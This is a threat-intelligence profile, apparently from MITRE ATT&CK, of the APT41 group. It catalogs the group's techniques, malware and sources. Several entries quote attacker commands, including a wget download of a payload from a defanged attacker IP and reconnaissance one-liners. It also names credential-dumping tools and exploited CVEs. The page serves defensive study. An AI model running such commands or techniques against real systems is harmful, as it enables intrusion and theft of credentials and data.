Skip to content

G0096 APT41

APT41 is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, APT41 has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. APT41 overlaps at least partially with public reporting on groups including BARIUM and Winnti Group.34

Item Value
ID G0096
Associated Names Wicked Panda
Version 3.1
Created 23 September 2019
Last Modified 23 March 2023
Navigation Layer View In ATT&CK® Navigator

Associated Group Descriptions

Name Description
Wicked Panda 1

Techniques Used

Domain ID Name Use
enterprise T1134 Access Token Manipulation During C0017, APT41 used a ConfuserEx obfuscated BADPOTATO exploit to abuse named-pipe impersonation for local NT AUTHORITY\SYSTEM privilege escalation.7
enterprise T1098 Account Manipulation APT41 has added user accounts to the User and Admin groups.3
enterprise T1071 Application Layer Protocol -
enterprise T1071.001 Web Protocols APT41 used HTTP to download payloads for CVE-2019-19781 and CVE-2020-10189 exploits.5

During C0017, APT41 ran wget http://103.224.80[.]44:8080/kernel to download malicious payloads.7

enterprise T1071.002 File Transfer Protocols APT41 used exploit payloads that initiate download via ftp.5
enterprise T1071.004 DNS APT41 used DNS for C2 communications.34
enterprise T1560 Archive Collected Data -
enterprise T1560.001 Archive via Utility APT41 created a RAR archive of targeted files for exfiltration.3
enterprise T1560.003 Archive via Custom Method During C0017, APT41 hex-encoded PII data prior to exfiltration.7
enterprise T1197 BITS Jobs APT41 used BITSAdmin to download and install payloads.51
enterprise T1547 Boot or Logon Autostart Execution -
enterprise T1547.001 Registry Run Keys / Startup Folder APT41 created and modified startup files for persistence.34 APT41 added a registry key in HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost to establish persistence for Cobalt Strike.5
enterprise T1110 Brute Force -
enterprise T1110.002 Password Cracking APT41 performed password brute-force attacks on the local admin account.3
enterprise T1059 Command and Scripting Interpreter -
enterprise T1059.001 PowerShell APT41 leveraged PowerShell to deploy malware families in victims’ environments.35
enterprise T1059.003 Windows Command Shell APT41 used cmd.exe /c to execute commands on remote machines.3
APT41 used a batch file to install persistence for the Cobalt Strike BEACON loader.5

During C0017, APT41 used cmd.exe to execute reconnaissance commands.7

enterprise T1059.004 Unix Shell APT41 executed file /bin/pwd in activity exploiting CVE-2019-19781 against Citrix devices.5
enterprise T1059.007 JavaScript During C0017, APT41 deployed JScript web shells on compromised systems.7
enterprise T1136 Create Account -
enterprise T1136.001 Local Account APT41 has created user accounts.3
enterprise T1543 Create or Modify System Process -
enterprise T1543.003 Windows Service APT41 modified legitimate Windows services to install malware backdoors.34 APT41 created the StorSyncSvc service to provide persistence for Cobalt Strike.5
enterprise T1486 Data Encrypted for Impact APT41 used a ransomware called Encryptor RaaS to encrypt files on the targeted systems and provide a ransom note to the user.3
enterprise T1005 Data from Local System APT41 has uploaded files and data from a compromised host.4

During C0017, APT41 collected information related to compromised machines as well as Personal Identifiable Information (PII) from victim networks.7

enterprise T1001 Data Obfuscation -
enterprise T1001.003 Protocol Impersonation During C0017, APT41 frequently configured the URL endpoints of their stealthy passive backdoor LOWKEY.PASSIVE to masquerade as normal web application traffic on an infected server.7
enterprise T1074 Data Staged -
enterprise T1074.001 Local Data Staging During C0017, APT41 copied the local SAM and SYSTEM Registry hives to a staging directory.7
enterprise T1140 Deobfuscate/Decode Files or Information During C0017, APT41 used the DUSTPAN loader to decrypt embedded payloads.7
enterprise T1568 Dynamic Resolution -
enterprise T1568.002 Domain Generation Algorithms APT41 has used DGAs to change their C2 servers monthly.3
enterprise T1546 Event Triggered Execution -
enterprise T1546.008 Accessibility Features APT41 leveraged sticky keys to establish persistence.3
enterprise T1480 Execution Guardrails -
enterprise T1480.001 Environmental Keying APT41 has encrypted payloads using the Data Protection API (DPAPI), which relies on keys tied to specific user accounts on specific machines. APT41 has also environmentally keyed second stage malware with an RC5 key derived in part from the infected system’s volume serial number.6
enterprise T1048 Exfiltration Over Alternative Protocol -
enterprise T1048.003 Exfiltration Over Unencrypted Non-C2 Protocol During C0017, APT41 exfiltrated victim data via DNS lookups by encoding and prepending it as subdomains to the attacker-controlled domain.7
enterprise T1041 Exfiltration Over C2 Channel During C0017, APT41 used its Cloudflare services C2 channels for data exfiltration.7
enterprise T1567 Exfiltration Over Web Service During C0017, APT41 used Cloudflare services for data exfiltration.7
enterprise T1190 Exploit Public-Facing Application APT41 exploited CVE-2020-10189 against Zoho ManageEngine Desktop Central, and CVE-2019-19781 to compromise Citrix Application Delivery Controllers (ADC) and gateway devices.5

During C0017, APT41 exploited CVE-2021-44207 in the USAHerds application and CVE-2021-44228 in Log4j, as well as other .NET deserialization, SQL injection, and directory traversal vulnerabilities to gain initial access.7

enterprise T1203 Exploitation for Client Execution APT41 leveraged the follow exploits in their operations: CVE-2012-0158, CVE-2015-1641, CVE-2017-0199, CVE-2017-11882, and CVE-2019-3396.3
enterprise T1068 Exploitation for Privilege Escalation During C0017, APT41 abused named pipe impersonation for privilege escalation.7
enterprise T1133 External Remote Services APT41 compromised an online billing/payment service using VPN access between a third-party service provider and the targeted payment service.3
enterprise T1008 Fallback Channels APT41 used the Steam community page as a fallback mechanism for C2.3
enterprise T1083 File and Directory Discovery APT41 has executed file /bin/pwd on exploited victims, perhaps to return architecture related information.5
enterprise T1574 Hijack Execution Flow During C0017, APT41 established persistence by loading malicious libraries via modifications to the Import Address Table (IAT) within legitimate Microsoft binaries.7
enterprise T1574.001 DLL Search Order Hijacking APT41 has used search order hijacking to execute malicious payloads, such as Winnti RAT.1
enterprise T1574.002 DLL Side-Loading APT41 used legitimate executables to perform DLL side-loading of their malware.3
enterprise T1574.006 Dynamic Linker Hijacking APT41 has configured payloads to load via LD_PRELOAD.1
enterprise T1070 Indicator Removal -
enterprise T1070.001 Clear Windows Event Logs APT41 attempted to remove evidence of some of its activity by clearing Windows security and system events.3
enterprise T1070.003 Clear Command History APT41 attempted to remove evidence of some of its activity by deleting Bash histories.3
enterprise T1070.004 File Deletion APT41 deleted files from the system.3
enterprise T1105 Ingress Tool Transfer APT41 used certutil to download additional files.514

During C0017, APT41 downloaded malicious payloads onto compromised systems.7

enterprise T1056 Input Capture -
enterprise T1056.001 Keylogging APT41 used a keylogger called GEARSHIFT on a target system.3
enterprise T1036 Masquerading -
enterprise T1036.004 Masquerade Task or Service APT41 has created services to appear as benign system tools.4

During C0017, APT41 used SCHTASKS /Change to modify legitimate scheduled tasks to run malicious code.7

enterprise T1036.005 Match Legitimate Name or Location APT41 attempted to masquerade their files as popular anti-virus software.34

During C0017, APT41 used file names beginning with USERS, SYSUSER, and SYSLOG for DEADEYE, and changed KEYPLUG file extensions from .vmp to .upx likely to avoid hunting detections.7

enterprise T1112 Modify Registry APT41 used a malware variant called GOODLUCK to modify the registry in order to steal credentials.34
enterprise T1104 Multi-Stage Channels APT41 used the storescyncsvc.dll BEACON backdoor to download a secondary backdoor.5
enterprise T1046 Network Service Discovery APT41 used a malware variant called WIDETONE to conduct port scans on specified subnets.3
enterprise T1135 Network Share Discovery APT41 used the net share command as part of network reconnaissance.34
enterprise T1027 Obfuscated Files or Information APT41 used VMProtected binaries in multiple intrusions.5

During C0017, APT41 broke malicious binaries, including DEADEYE and KEYPLUG, into multiple sections on disk to evade detection.7

enterprise T1027.002 Software Packing During C0017, APT41 used VMProtect to slow the reverse engineering of malicious binaries.7
enterprise T1588 Obtain Capabilities -
enterprise T1588.002 Tool APT41 has obtained and used tools such as Mimikatz, pwdump, PowerSploit, and Windows Credential Editor.3

For C0017, APT41 obtained publicly available tools such as YSoSerial.NET, ConfuserEx, and BadPotato.7

enterprise T1003 OS Credential Dumping -
enterprise T1003.001 LSASS Memory APT41 has used hashdump, Mimikatz, and the Windows Credential Editor to dump password hashes from memory and authenticate to other user accounts.34
enterprise T1003.002 Security Account Manager During C0017, APT41 copied the SAM and SYSTEM Registry hives for credential harvesting.7
enterprise T1566 Phishing -
enterprise T1566.001 Spearphishing Attachment APT41 sent spearphishing emails with attachments such as compiled HTML (.chm) files to initially compromise their victims.3
enterprise T1542 Pre-OS Boot -
enterprise T1542.003 Bootkit APT41 deployed Master Boot Record bootkits on Windows systems to hide their malware and maintain persistence on victim systems.3
enterprise T1055 Process Injection APT41 malware TIDYELF loaded the main WINTERLOVE component by injecting it into the iexplore.exe process.3
enterprise T1090 Proxy APT41 used a tool called CLASSFON to covertly proxy network communications.3

During C0017, APT41 used the Cloudflare CDN to proxy C2 traffic.7

enterprise T1021 Remote Services -
enterprise T1021.001 Remote Desktop Protocol APT41 used RDP for lateral movement.31
enterprise T1021.002 SMB/Windows Admin Shares APT41 has transferred implant files using Windows Admin Shares.1
enterprise T1496 Resource Hijacking APT41 deployed a Monero cryptocurrency mining tool in a victim’s environment.3
enterprise T1014 Rootkit APT41 deployed rootkits on Linux systems.31
enterprise T1053 Scheduled Task/Job -
enterprise T1053.005 Scheduled Task APT41 used a compromised account to create a scheduled task on a system.31

During C0017, APT41 used the following Windows scheduled tasks for DEADEYE dropper persistence on US state government networks: \Microsoft\Windows\PLA\Server Manager Performance Monitor, \Microsoft\Windows\Ras\ManagerMobility, \Microsoft\Windows\WDI\SrvSetupResults, and \Microsoft\Windows\WDI\USOShared.7

enterprise T1505 Server Software Component -
enterprise T1505.003 Web Shell During C0017, APT41 deployed JScript web shells through the creation of malicious ViewState objects.7
enterprise T1553 Subvert Trust Controls -
enterprise T1553.002 Code Signing APT41 leveraged code-signing certificates to sign malware when targeting both gaming and non-gaming organizations.34
enterprise T1195 Supply Chain Compromise -
enterprise T1195.002 Compromise Software Supply Chain APT41 gained access to production environments where they could inject malicious code into legitimate, signed files and widely distribute them to end users.3
enterprise T1218 System Binary Proxy Execution -
enterprise T1218.001 Compiled HTML File APT41 used compiled HTML (.chm) files for targeting.3
enterprise T1218.011 Rundll32 APT41 has used rundll32.exe to execute a loader.1
enterprise T1082 System Information Discovery During C0017, APT41 issued ping -n 1 ((cmd /c dir c:\|findstr Number).split()[-1]+ commands to find the volume serial number of compromised systems.7
enterprise T1016 System Network Configuration Discovery APT41 collected MAC addresses from victim machines.34

During C0017, APT41 used cmd.exe /c ping %userdomain% for discovery.7

enterprise T1049 System Network Connections Discovery APT41 has enumerated IP addresses of network resources and used the netstat command as part of network reconnaissance. The group has also used a malware variant, HIGHNOON, to enumerate active RDP sessions.34
enterprise T1033 System Owner/User Discovery APT41 used the WMIEXEC utility to execute whoami commands on remote machines.3

During C0017, APT41 used whoami to gather information from victim machines.7

enterprise T1569 System Services -
enterprise T1569.002 Service Execution APT41 used svchost.exe and Net to execute a system service installed to launch a Cobalt Strike BEACON loader.54
enterprise T1078 Valid Accounts APT41 used compromised credentials to log on to other systems.31
enterprise T1102 Web Service During C0017, APT41 used the Cloudflare services for C2 communications.7
enterprise T1102.001 Dead Drop Resolver APT41 used legitimate websites for C2 through dead drop resolvers (DDR), including GitHub, Pastebin, and Microsoft TechNet.3

During C0017, APT41 used dead drop resolvers on two separate tech community forums for their KEYPLUG Windows-version backdoor; notably APT41 updated the community forum posts frequently with new dead drop resolvers during the campaign.7

enterprise T1047 Windows Management Instrumentation APT41 used WMI in several ways, including for execution of commands via WMIEXEC as well as for persistence via PowerSploit.34

Software

ID Name References Techniques
S0073 ASPXSpy 3 Web Shell:Server Software Component
S0190 BITSAdmin 5 BITS Jobs Exfiltration Over Unencrypted Non-C2 Protocol:Exfiltration Over Alternative Protocol Ingress Tool Transfer Lateral Tool Transfer
S0069 BLACKCOFFEE 3 Windows Command Shell:Command and Scripting Interpreter File and Directory Discovery File Deletion:Indicator Removal Multi-Stage Channels Process Discovery Dead Drop Resolver:Web Service Bidirectional Communication:Web Service
S0160 certutil 5 Archive via Utility:Archive Collected Data Deobfuscate/Decode Files or Information Ingress Tool Transfer Install Root Certificate:Subvert Trust Controls
S0020 China Chopper 3 Web Protocols:Application Layer Protocol Password Guessing:Brute Force Windows Command Shell:Command and Scripting Interpreter Data from Local System File and Directory Discovery Timestomp:Indicator Removal Ingress Tool Transfer Network Service Discovery Software Packing:Obfuscated Files or Information Web Shell:Server Software Component
S0154 Cobalt Strike 54 Sudo and Sudo Caching:Abuse Elevation Control Mechanism Bypass User Account Control:Abuse Elevation Control Mechanism Token Impersonation/Theft:Access Token Manipulation Make and Impersonate Token:Access Token Manipulation Parent PID Spoofing:Access Token Manipulation Domain Account:Account Discovery Web Protocols:Application Layer Protocol DNS:Application Layer Protocol Application Layer Protocol BITS Jobs Browser Session Hijacking Visual Basic:Command and Scripting Interpreter Python:Command and Scripting Interpreter JavaScript:Command and Scripting Interpreter PowerShell:Command and Scripting Interpreter Windows Command Shell:Command and Scripting Interpreter Windows Service:Create or Modify System Process Standard Encoding:Data Encoding Data from Local System Protocol Impersonation:Data Obfuscation Data Transfer Size Limits Deobfuscate/Decode Files or Information Asymmetric Cryptography:Encrypted Channel Symmetric Cryptography:Encrypted Channel Exploitation for Client Execution Exploitation for Privilege Escalation File and Directory Discovery Process Argument Spoofing:Hide Artifacts Disable or Modify Tools:Impair Defenses Timestomp:Indicator Removal Ingress Tool Transfer Keylogging:Input Capture Modify Registry Native API Network Service Discovery Network Share Discovery Non-Application Layer Protocol Indicator Removal from Tools:Obfuscated Files or Information Obfuscated Files or Information Office Template Macros:Office Application Startup Security Account Manager:OS Credential Dumping LSASS Memory:OS Credential Dumping Local Groups:Permission Groups Discovery Domain Groups:Permission Groups Discovery Process Discovery Process Hollowing:Process Injection Process Injection Dynamic-link Library Injection:Process Injection Protocol Tunneling Domain Fronting:Proxy Internal Proxy:Proxy Query Registry Reflective Code Loading Windows Remote Management:Remote Services SMB/Windows Admin Shares:Remote Services SSH:Remote Services Remote Desktop Protocol:Remote Services Distributed Component Object Model:Remote Services Remote System Discovery Scheduled Transfer Screen Capture Software Discovery Code Signing:Subvert Trust Controls Rundll32:System Binary Proxy Execution System Network Configuration Discovery System Network Connections Discovery System Service Discovery Service Execution:System Services Pass the Hash:Use Alternate Authentication Material Domain Accounts:Valid Accounts Local Accounts:Valid Accounts Windows Management Instrumentation
S1052 DEADEYE 7 Windows Command Shell:Command and Scripting Interpreter Deobfuscate/Decode Files or Information Execution Guardrails NTFS File Attributes:Hide Artifacts Masquerade Task or Service:Masquerading Native API Embedded Payloads:Obfuscated Files or Information Obfuscated Files or Information Scheduled Task/Job Rundll32:System Binary Proxy Execution Msiexec:System Binary Proxy Execution System Information Discovery System Network Configuration Discovery
S0021 Derusbi 3 Audio Capture Unix Shell:Command and Scripting Interpreter Symmetric Cryptography:Encrypted Channel Fallback Channels File and Directory Discovery File Deletion:Indicator Removal Timestomp:Indicator Removal Keylogging:Input Capture Non-Application Layer Protocol Non-Standard Port Process Discovery Dynamic-link Library Injection:Process Injection Query Registry Screen Capture Regsvr32:System Binary Proxy Execution System Information Discovery System Owner/User Discovery Video Capture
S0105 dsquery 7 Domain Account:Account Discovery Domain Trust Discovery Domain Groups:Permission Groups Discovery System Information Discovery
S0363 Empire 1 Bypass User Account Control:Abuse Elevation Control Mechanism Access Token Manipulation SID-History Injection:Access Token Manipulation Create Process with Token:Access Token Manipulation Domain Account:Account Discovery Local Account:Account Discovery LLMNR/NBT-NS Poisoning and SMB Relay:Adversary-in-the-Middle Web Protocols:Application Layer Protocol Archive Collected Data Automated Collection Automated Exfiltration Shortcut Modification:Boot or Logon Autostart Execution Registry Run Keys / Startup Folder:Boot or Logon Autostart Execution Security Support Provider:Boot or Logon Autostart Execution Browser Information Discovery Clipboard Data PowerShell:Command and Scripting Interpreter Windows Command Shell:Command and Scripting Interpreter Command and Scripting Interpreter Domain Account:Create Account Local Account:Create Account Windows Service:Create or Modify System Process Credentials from Web Browsers:Credentials from Password Stores Group Policy Modification:Domain Policy Modification Domain Trust Discovery Local Email Collection:Email Collection Asymmetric Cryptography:Encrypted Channel Accessibility Features:Event Triggered Execution Exfiltration Over C2 Channel Exfiltration to Code Repository:Exfiltration Over Web Service Exfiltration to Cloud Storage:Exfiltration Over Web Service Exploitation for Privilege Escalation Exploitation of Remote Services File and Directory Discovery Group Policy Discovery Path Interception by Search Order Hijacking:Hijack Execution Flow Dylib Hijacking:Hijack Execution Flow Path Interception by Unquoted Path:Hijack Execution Flow DLL Search Order Hijacking:Hijack Execution Flow Path Interception by PATH Environment Variable:Hijack Execution Flow Timestomp:Indicator Removal Ingress Tool Transfer Keylogging:Input Capture Credential API Hooking:Input Capture Native API Network Service Discovery Network Share Discovery Network Sniffing Command Obfuscation:Obfuscated Files or Information LSASS Memory:OS Credential Dumping Process Discovery Process Injection Distributed Component Object Model:Remote Services SSH:Remote Services Scheduled Task:Scheduled Task/Job Screen Capture Security Software Discovery:Software Discovery Kerberoasting:Steal or Forge Kerberos Tickets Silver Ticket:Steal or Forge Kerberos Tickets Golden Ticket:Steal or Forge Kerberos Tickets System Information Discovery System Network Configuration Discovery System Network Connections Discovery System Owner/User Discovery Service Execution:System Services MSBuild:Trusted Developer Utilities Proxy Execution Credentials In Files:Unsecured Credentials Private Keys:Unsecured Credentials Pass the Hash:Use Alternate Authentication Material Video Capture Bidirectional Communication:Web Service Windows Management Instrumentation
S0095 ftp 5 Exfiltration Over Unencrypted Non-C2 Protocol:Exfiltration Over Alternative Protocol Ingress Tool Transfer Lateral Tool Transfer
S0032 gh0st RAT 3 Registry Run Keys / Startup Folder:Boot or Logon Autostart Execution Command and Scripting Interpreter Windows Service:Create or Modify System Process Standard Encoding:Data Encoding Deobfuscate/Decode Files or Information Fast Flux DNS:Dynamic Resolution Symmetric Cryptography:Encrypted Channel Encrypted Channel DLL Side-Loading:Hijack Execution Flow Clear Windows Event Logs:Indicator Removal File Deletion:Indicator Removal Ingress Tool Transfer Keylogging:Input Capture Modify Registry Native API Non-Application Layer Protocol Process Discovery Process Injection Query Registry Screen Capture Shared Modules Rundll32:System Binary Proxy Execution System Information Discovery Service Execution:System Services
S0100 ipconfig 4 System Network Configuration Discovery
S1051 KEYPLUG 7 Web Protocols:Application Layer Protocol Deobfuscate/Decode Files or Information Asymmetric Cryptography:Encrypted Channel Non-Application Layer Protocol Obfuscated Files or Information Proxy System Time Discovery Dead Drop Resolver:Web Service
S0443 MESSAGETAP 81 Archive via Custom Method:Archive Collected Data Automated Collection Local Data Staging:Data Staged Deobfuscate/Decode Files or Information File and Directory Discovery File Deletion:Indicator Removal Network Sniffing System Network Connections Discovery
S0002 Mimikatz 34 SID-History Injection:Access Token Manipulation Account Manipulation Security Support Provider:Boot or Logon Autostart Execution Credentials from Password Stores Windows Credential Manager:Credentials from Password Stores Credentials from Web Browsers:Credentials from Password Stores LSASS Memory:OS Credential Dumping DCSync:OS Credential Dumping Security Account Manager:OS Credential Dumping LSA Secrets:OS Credential Dumping Rogue Domain Controller Steal or Forge Authentication Certificates Silver Ticket:Steal or Forge Kerberos Tickets Golden Ticket:Steal or Forge Kerberos Tickets Private Keys:Unsecured Credentials Pass the Ticket:Use Alternate Authentication Material Pass the Hash:Use Alternate Authentication Material
S0039 Net 3 Domain Account:Account Discovery Local Account:Account Discovery Local Account:Create Account Domain Account:Create Account Network Share Connection Removal:Indicator Removal Network Share Discovery Password Policy Discovery Local Groups:Permission Groups Discovery Domain Groups:Permission Groups Discovery SMB/Windows Admin Shares:Remote Services Remote System Discovery System Network Connections Discovery System Service Discovery Service Execution:System Services System Time Discovery
S0104 netstat 3 System Network Connections Discovery
S0385 njRAT 3 Web Protocols:Application Layer Protocol Application Window Discovery Registry Run Keys / Startup Folder:Boot or Logon Autostart Execution Windows Command Shell:Command and Scripting Interpreter PowerShell:Command and Scripting Interpreter Credentials from Web Browsers:Credentials from Password Stores Standard Encoding:Data Encoding Data from Local System Fast Flux DNS:Dynamic Resolution Exfiltration Over C2 Channel File and Directory Discovery Disable or Modify System Firewall:Impair Defenses Clear Persistence:Indicator Removal File Deletion:Indicator Removal Ingress Tool Transfer Keylogging:Input Capture Modify Registry Native API Non-Standard Port Compile After Delivery:Obfuscated Files or Information Obfuscated Files or Information Peripheral Device Discovery Process Discovery Query Registry Remote Desktop Protocol:Remote Services Remote System Discovery Replication Through Removable Media Screen Capture System Information Discovery System Owner/User Discovery Video Capture
S0097 Ping 34 Remote System Discovery
S0013 PlugX 3 DNS:Application Layer Protocol Web Protocols:Application Layer Protocol Registry Run Keys / Startup Folder:Boot or Logon Autostart Execution Windows Command Shell:Command and Scripting Interpreter Windows Service:Create or Modify System Process Deobfuscate/Decode Files or Information Symmetric Cryptography:Encrypted Channel File and Directory Discovery Hidden Files and Directories:Hide Artifacts DLL Side-Loading:Hijack Execution Flow DLL Search Order Hijacking:Hijack Execution Flow Ingress Tool Transfer Keylogging:Input Capture Masquerade Task or Service:Masquerading Match Legitimate Name or Location:Masquerading Modify Registry Native API Network Share Discovery Non-Application Layer Protocol Obfuscated Files or Information Process Discovery Query Registry Screen Capture System Network Connections Discovery MSBuild:Trusted Developer Utilities Proxy Execution System Checks:Virtualization/Sandbox Evasion Dead Drop Resolver:Web Service
S0194 PowerSploit 3 Access Token Manipulation Local Account:Account Discovery Audio Capture Registry Run Keys / Startup Folder:Boot or Logon Autostart Execution Security Support Provider:Boot or Logon Autostart Execution PowerShell:Command and Scripting Interpreter Windows Service:Create or Modify System Process Windows Credential Manager:Credentials from Password Stores Data from Local System Domain Trust Discovery DLL Search Order Hijacking:Hijack Execution Flow Path Interception by Unquoted Path:Hijack Execution Flow Path Interception by Search Order Hijacking:Hijack Execution Flow Path Interception by PATH Environment Variable:Hijack Execution Flow Keylogging:Input Capture Indicator Removal from Tools:Obfuscated Files or Information Command Obfuscation:Obfuscated Files or Information LSASS Memory:OS Credential Dumping Process Discovery Dynamic-link Library Injection:Process Injection Query Registry Reflective Code Loading Scheduled Task:Scheduled Task/Job Screen Capture Kerberoasting:Steal or Forge Kerberos Tickets Credentials in Registry:Unsecured Credentials Group Policy Preferences:Unsecured Credentials Windows Management Instrumentation
S0006 pwdump 3 Security Account Manager:OS Credential Dumping
S0112 ROCKBOOT 3 Bootkit:Pre-OS Boot
S0596 ShadowPad 39 File Transfer Protocols:Application Layer Protocol DNS:Application Layer Protocol Web Protocols:Application Layer Protocol Non-Standard Encoding:Data Encoding Deobfuscate/Decode Files or Information Domain Generation Algorithms:Dynamic Resolution Indicator Removal Ingress Tool Transfer Modify Registry Non-Application Layer Protocol Fileless Storage:Obfuscated Files or Information Obfuscated Files or Information Process Discovery Process Injection Dynamic-link Library Injection:Process Injection Scheduled Transfer System Information Discovery System Network Configuration Discovery System Owner/User Discovery System Time Discovery
S0430 Winnti for Linux 1 Web Protocols:Application Layer Protocol Deobfuscate/Decode Files or Information Symmetric Cryptography:Encrypted Channel Ingress Tool Transfer Non-Application Layer Protocol Obfuscated Files or Information Rootkit Traffic Signaling
S0412 ZxShell 3 Create Process with Token:Access Token Manipulation Web Protocols:Application Layer Protocol File Transfer Protocols:Application Layer Protocol Windows Command Shell:Command and Scripting Interpreter Local Account:Create Account Windows Service:Create or Modify System Process Data from Local System Endpoint Denial of Service Exploit Public-Facing Application File and Directory Discovery Disable or Modify Tools:Impair Defenses Disable or Modify System Firewall:Impair Defenses File Deletion:Indicator Removal Clear Windows Event Logs:Indicator Removal Ingress Tool Transfer Credential API Hooking:Input Capture Keylogging:Input Capture Modify Registry Native API Network Service Discovery Non-Standard Port Process Discovery Dynamic-link Library Injection:Process Injection Proxy Query Registry Remote Desktop Protocol:Remote Services VNC:Remote Services Screen Capture Rundll32:System Binary Proxy Execution System Information Discovery System Owner/User Discovery System Service Discovery Service Execution:System Services Video Capture

References


  1. Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020. 

  2. FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019. 

  3. Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019. 

  4. Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021. 

  5. Glyer, C, et al. (2020, March). This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved April 28, 2020. 

  6. Carr, N. (2019, October 30). Nick Carr Status Update APT41 Environmental Keying. Retrieved June 23, 2020. 

  7. Rufus Brown, Van Ta, Douglas Bienstock, Geoff Ackerman, John Wolfram. (2022, March 8). Does This Look Infected? A Summary of APT41 Targeting U.S. State Governments. Retrieved July 8, 2022. 

  8. Leong, R., Perez, D., Dean, T. (2019, October 31). MESSAGETAP: Who’s Reading Your Text Messages?. Retrieved May 11, 2020. 

  9. Insikt Group. (2021, February 28). China-Linked Group RedEcho Targets the Indian Power Sector Amid Heightened Border Tensions. Retrieved March 22, 2021.